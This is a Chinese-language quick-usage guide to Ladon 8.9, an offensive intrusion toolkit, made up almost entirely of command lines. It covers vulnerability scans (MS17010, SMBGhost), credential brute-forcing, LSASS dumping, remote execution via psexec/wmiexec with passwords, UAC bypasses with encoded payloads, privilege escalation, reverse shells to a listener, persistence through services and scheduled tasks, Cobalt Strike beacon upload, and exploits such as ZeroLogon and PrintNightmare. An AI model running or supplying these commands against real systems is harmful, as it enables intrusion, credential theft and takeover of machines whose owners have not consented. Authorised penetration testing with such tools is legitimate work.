发布时间:2025-12-09 22:12:31 浏览次数:3
Ladon 简明使用教程 完整文档: http://k8gege.org/Ladon
支持Cmd、Shell、Cobalt Strike、PowerShell下使用
Windows版本: .Net、Cobalt Strike、PowerShell
全系统版本:GO(全平台)、Python(理论上全平台)
PS: GUI版主要方便本地测试使用,完整功能使用CMD
Ladon8.9 20210920
简明用法例子 120模块
例子:扫描目标10.1.2段是否存在MS17010漏洞
单线程:Ladon 10.1.2.8/24 MS17010 t=1
80线程:Ladon noping 10.1.2.8/24 MS17010 t=80
在高强度防护下的网络默认线程无法扫描,必须单线程
例子:扫描目标10.1.2段是否存在MS17010漏洞(必须加noping)
Ladon noping 10.1.2.8/24 MS17010
详见:http://k8gege.org/Ladon/proxy.html
CIDR格式:不只是/24/16/8(所有)
Ladon 192.168.1.8/24 扫描模块
Ladon 192.168.1.8/16 扫描模块
Ladon 192.168.1.8/8 扫描模块
字母格式:仅C段B段A段 顺序排序
Ladon 192.168.1.8/c 扫描模块
Ladon 192.168.1.8/b 扫描模块
Ladon 192.168.1.8/a 扫描模块
Ladon 192.168.1.8/24 OnlinePC
Ladon 192.168.1.8/24 OsScan
Ladon 192.168.1.8/24 OnlineIP
Ladon 192.168.1.8/24 Ping
Ladon 192.168.1.8/24 MS17010
Ladon 192.168.1.8/24 SMBGhost
Ladon 192.168.1.8/24 WebScan
Ladon 192.168.1.8/24 UrlScan
Ladon 192.168.1.8/24 SameWeb
Ladon baidu.com SubDomain
Ladon baidu.com DomainIP
Ladon baidu.com HostIP
Ladon AdiDnsDump 192.168.1.8 (Domain IP)
Ladon 192.168.1.8/24 PortScan
Ladon 192.168.1.8 PortScan 80,445,3389
Ladon 192.168.1.8/24 WhatCMS
Ladon 192.168.1.8/24 CiscoScan
Ladon http://192.168.1.8 CiscoScan
Ladon EnumMssql
Ladon EnumShare
Ladon 192.168.1.8/24 LdapScan
Ladon 192.168.1.8/24 FtpScan
密码爆破详解参考SSH:http://k8gege.org/Ladon/sshscan.html
Ladon 192.168.1.8/24 SmbScan
Ladon 192.168.1.8/24 WmiScan
Ladon 192.168.1.8/24 LdapScan
Ladon 192.168.1.8/24 WinrmScan.ini
Ladon 192.168.1.8/24 SmbHashScan
Ladon 192.168.1.8/24 WmiHashScan
Ladon 192.168.1.8/24 SshScan
Ladon 192.168.1.8:22 SshScan
Ladon 192.168.1.8/24 MssqlScan
Ladon 192.168.1.8/24 OracleScan
Ladon 192.168.1.8/24 MysqlScan
Ladon http://192.168.1.8:7001/console WeblogicScan
Ladon 192.168.1.8/24 WeblogicScan
Ladon 192.168.1.8/24 VncScan
Ladon 192.168.1.8/24 FtpScan
Ladon 192.168.1.8/24 TomcatScan
Ladon http://192.168.1.8:8080/manage TomcatScan
Ladon http://192.168.1.8/login HttpBasicScan
Ladon 192.168.1.8/24 SmbScan.ini
Ladon 192.168.1.8/24 IpcScan.ini
Ladon 192.168.1.8/24 MS17010
Ladon 192.168.1.8/24 WeblogicPoc
Ladon 192.168.1.8/24 PhpStudyPoc
Ladon 192.168.1.8/24 ActivemqPoc
Ladon 192.168.1.8/24 TomcatPoc
Ladon 192.168.1.8/24 WeblogicExp
Ladon 192.168.1.8/24 TomcatExp
Ladon 192.168.1.8/24 Struts2Poc
Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar
Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe
Ladon 123456 EnHex
Ladon 313233343536 DeHex
Ladon 123456 EnBase64
Ladon MTIzNDU2 DeBase64
Ladon FtpSniffer 192.168.1.5
Ladon HTTPSniffer 192.168.1.5
Ladon Sniffer
Ladon IISpwd
Ladon DumpLsass
Ladon EnumProcess
Ladon Tasklist
Ladon cmdline
Ladon cmdline cmd.exe
Ladon GetInfo
Ladon GetInfo2
Ladon NetVer
Ladon PSver
Ladon NetVersion
Ladon PSversion
Ladon Ver
Ladon Version
net user \192.168.1.8 k8gege520 /user:k8gege
Ladon psexec 192.168.1.8
psexec> whoami
nt authority\system
Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami (8.2前用法)
Ladon wmiexec 192.168.1.8 k8gege k8gege520 cmd whoami (8.2后用法)
Ladon wmiexec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p (8.2后用法)
Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami
Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami
Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami
Usage:Ladon JspShell type url pwd cmd
Example: Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami
Ladon BypassUac2 c:\1.exe
Ladon BypassUac2 c:\1.bat
Ladon GetSystem cmd.exe
Ladon GetSystem cmd.exe explorer
Ladon Runas user pass cmd
Ladon EnableDotNet
Ladon gethtml http://192.168.1.1
Ladon CheckDoor
Ladon AutoRun
Ladon GetIP
Ladon WebSer 80
Ladon web 80
列目录
Ladon web 80 dir
获取外网IP(VPS上启动WEB,目标访问ip.txt或ip.jpg)
http://192.168.1.8/ip.txt
Ladon ReverseTcp 192.168.1.8 4444 nc
Ladon ReverseTcp 192.168.1.8 4444 shell
Ladon ReverseTcp 192.168.1.8 4444 meter
Ladon ReverseHttp 192.168.1.8 4444
Ladon ReverseHttps 192.168.1.8 4444
Ladon PowerCat 192.168.1.8 4444 cmd
Ladon PowerCat 192.168.1.8 4444 psh
Ladon PowerCat 192.168.1.8 4444 cmd udp
Ladon PowerCat 192.168.1.8 4444 psh udp
Ladon RDPHijack 3
Ladon RDPHijack 3 console
Ladon 192.168.1.8/24 EthScan
Ladon 192.168.1.8/24 OxidScan
Ladon Recent
Ladon RegAuto Test c:\123.exe
Ladon at c:\123.exe
Ladon at c:\123.exe gui
Ladon sc c:\123.exe
Ladon sc c:\123.exe gui
Ladon sc c:\123.exe auto ServerName
Ladon ms16135 whoami
Ladon BadPotato cmdline
Ladon SweetPotato cmdline
Ladon whoami
Ladon Open3389
Ladon RdpLog
Ladon QueryAdmin
Ladon ActiveAdmin
Ladon ActiveGuest
Ladon GetPipe
Ladon 192.168.1.8/24 NbtScan
Ladon 192.168.1.8/24 WinrmScan
Ladon WinrmExec 192.168.1.8 5985 k8gege.org Administrator K8gege520 calc.exe
监听 Ladon web 800
提交 返回明文
certutil.exe -urlcache -split -f http://192.168.1.8:800/getstr/test123456
Base64加密结果
certutil.exe -urlcache -split -f http://192.168.1.110:800/getbase64/k8gege520
Base64结果解密
certutil.exe -urlcache -split -fhttp://192.168.1.110:800/debase64/azhnZWdlNTIw
Ladon ZeroLogon dc.k8gege.org
Ladon cve-2020-0688 192.168.1.142 Administrator K8gege520
Ladon 192.168.1.8/24 IsShiro
Ladon 192.168.1.8/24 DvrScan
Ladon 192.168.1.8/24 SnmpScan
Ladon 192.168.1.8/24 NbtInfo
Ladon 192.168.1.8/24 SmbInfo
Ladon 192.168.1.8/24 WmiInfo
Ladon 192.168.1.8/24 MssqlInfo
Ladon 192.168.1.8/24 WinrmInfo
Ladon 192.168.1.8/24 ExchangeInfo
For单线程: Ladon 192.168.1.8/24 RdpInfo f=1
Ladon netsh add 888 192.168.1.112 22
Ladon DirList 默认列全盘
Ladon DirList c:\ 指定盘符或目录
用法Ladon BypassUAC Method Base64Cmd
Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==
Usage:
Ladon WmiExec2 host user pass cmd whoami
Ladon WmiExec2 pth host cmd whoami
Base64Cmd for Cobalt Strike
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Upload:
Ladon WmiExec2 host user pass upload beacon.exe ceacon.exe
Ladon WmiExec2 pth host upload beacon.exe ceacon.exe
Ladon ForExec “CVE-2020-0796-Exp -i 192.168.1.8 -p 445 -e --load-shellcode test.txt” 80 “Exploit finnished”
Ladon PrintNightmare c:\evil.dll
Ladon CVE-2021-1675 c:\evil.dll
Ladon SmbExec 192.168.1.8 k8gege k8gege520 cmd whoami
Ladon SmbExec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p
Ladon UsbLog
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=
Ladon CVE-2021-40444 MakeCab poc.dll
Ladon CVE-2021-40444 MakeHtml http://192.168.1.8
Ladon 192.168.1.8/24 IsShiro.exe
历史版本: https://github.com/k8gege/Ladon/releases
7.0版本:https://k8gege.org/Download
8.9版本:K8小密圈